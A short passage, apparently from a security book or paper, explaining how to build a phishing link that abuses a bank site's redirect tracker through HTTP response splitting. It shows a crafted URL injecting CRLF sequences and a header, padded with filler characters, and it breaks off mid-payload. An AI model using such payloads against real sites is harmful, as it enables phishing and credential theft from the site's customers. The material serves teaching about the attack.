
site rather than going the first site, getting redirected to the phishing site, and
then going back. If that were the case, you might as well just redirect the victim
to the phishing site and request credentials from that server. Our link will look
like this:
http://www65.americanexpress.com/clicktrk/Tracking?url=www65.americanexpress
.com/clicktrk/Tracking?url=%0d%0aConnection:Keep-
Alive%0d%0a%0d%0aAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ...